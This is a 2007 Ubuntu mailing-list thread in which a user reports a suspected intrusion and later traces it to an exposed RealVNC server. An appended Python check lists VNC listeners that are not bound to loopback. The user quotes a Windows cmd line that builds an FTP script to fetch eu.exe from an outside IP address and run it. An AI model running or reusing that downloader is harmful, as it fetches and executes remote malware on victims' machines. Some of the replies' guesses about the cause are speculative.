Antivirus program for ubuntu feisty amd64

Lucio M Nicolosi lmario at philippe.com.br
Sat May 12 06:16:05 UTC 2007


cj wrote:
> Lucio M Nicolosi wrote:
>> cj wrote:
>>> Lucio M Nicolosi wrote:
>>>> Mario Vukelic wrote:
>>>>>> You would not have had any infections on Linux without the antivir
>>>>>> program either, since there are no Linux viruses in the wild :)
>>>> New to Linux, installed an Ubuntu 6.10 partition (for tests) on my office 
>>>> desktop, connected to Novell Netware and an ADSL link (Suse Linux Proxy 
>>>> and Firewall).
>>>>
>>>> A couple of days ago I noticed an application suddenly taking control of 
>>>> the terminal window and running the following script:
>>>>
>>>> (user)@phil:~$ 5~.~
>>>>
>>>> (user)@phil::~$ %systemroot%\system32\cmd.exe
>>>>
>>>> (user)@phil:~$ cmd /c echo open 201.27.157.123 42043 >> ik     &echo 
>>>> user t g >> ik &echo get eu.exe >> ik &echo bye >> ik &ftp -n -v -s:ik 
>>>> &del ik &eu.exe &exit
>>>>
>>>> from the script "ik" in /home/(user)
>>>>
>>>> Couldn't find any "ik" script in my home (Ubuntu 7.04) desktop.
>>>>
>>>> Looked like a worm, then I ran antivirus on the Win partition, looked for 
>>>> the Windows "eu.exe" virus and variants but found no trace of it, at 
>>>> least on my desktop.
>>>>
>>>> Has anyone any idea of what kind of script this is?
>>>>
>>>> L.
>>>>
>>> More than likely, someone logged on to your computer (looks like they 
>>> did it through telnet, but I could be wrong). In that case, either hook 
>>> your computer into a firewall or download one for Linux (which Linux 
>>> doesn't really need, but if you are using your system for large-scale 
>>> business, then it's a good idea to get a firewall).
>>>
>>> Sometimes I have noticed that when somebody logs on to my system and 
>>> runs their script (yes, I was hacked once... good thing my firewall blocked 
>>> the attack... but it didn't catch the remote login?), it doesn't execute 
>>> right... just FYI... most of the time it does though, especially when DoSing.
>>>
>>> --cj
>>>
>> Since my Intranet is already behind a (Suse) firewall, I was wondering 
>> if (either it was invaded or) a worm residing on another (Win) desktop 
>> could take control of my (Linux) terminal and run this script to try 
>> to install itself in the Win environment. Since it apparently happened on 
>> two different occasions, it looks like an autorun script. Could you tell 
>> me where to find the autorun config file in Ubuntu?
>>
>> Tks for the answer, cj.
>>
>> L.
>>
> Well, the problem is that a worm on Windows will not harm a Linux 
> system, as Windows programs are not Linux compatible without a Windows 
> compatibility layer (such as _wine_).
> --cj
Did a little more research and I guess I found the culprit: RealVNC access 
through a Static IP.
See:
http://episteme.arstechnica.com/eve/forums/a/tpc/f/469092836/m/264004244831

Very dangerous stuff indeed...

L.
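
Added example (not part of the original thread and not written by its participants): the culprit named above was a VNC server reachable from outside the machine, and this Python check lists listening sockets in the VNC port range that are not bound to loopback. It assumes the Linux /proc/net/tcp layout on a little-endian host such as amd64, IPv4 only, and ports 5900-5999; the sample table is constructed.

```python
import socket
import struct

VNC_PORTS = range(5900, 6000)   # assumption: RFB displays :0 to :99
TCP_LISTEN = "0A"               # state code for LISTEN in /proc/net/tcp

# Constructed sample in /proc/net/tcp layout (not taken from the thread).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111
   1: 00000000:170C 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 22222
   2: 0100007F:170D 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 33333
   3: 0A00A8C0:170C 0B00A8C0:C350 01 00000000:00000000 00:00000000 00000000  1000        0 44444
"""

def decode_endpoint(field):
    """Turn 'HEXIP:HEXPORT' into (dotted_ip, port); IP is little-endian hex."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def exposed_vnc_listeners(proc_net_tcp):
    """Return (ip, port, uid) for VNC-range listeners not bound to loopback."""
    findings = []
    for line in proc_net_tcp.splitlines()[1:]:      # skip the header row
        cols = line.split()
        if len(cols) < 8 or cols[3] != TCP_LISTEN:  # established sockets are ignored
            continue
        ip, port = decode_endpoint(cols[1])
        if port in VNC_PORTS and not ip.startswith("127."):
            findings.append((ip, port, int(cols[7])))
    return findings

if __name__ == "__main__":
    try:
        with open("/proc/net/tcp") as fh:           # live table on Linux
            table = fh.read()
    except OSError:
        table = SAMPLE                              # fall back to the constructed sample
    for ip, port, uid in exposed_vnc_listeners(table):
        print(f"VNC listener on {ip}:{port} (uid {uid}) is not loopback-only")
```

A listener reported on 0.0.0.0 accepts connections on every interface; binding the server to 127.0.0.1 and reaching it through an SSH tunnel removes it from this list.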





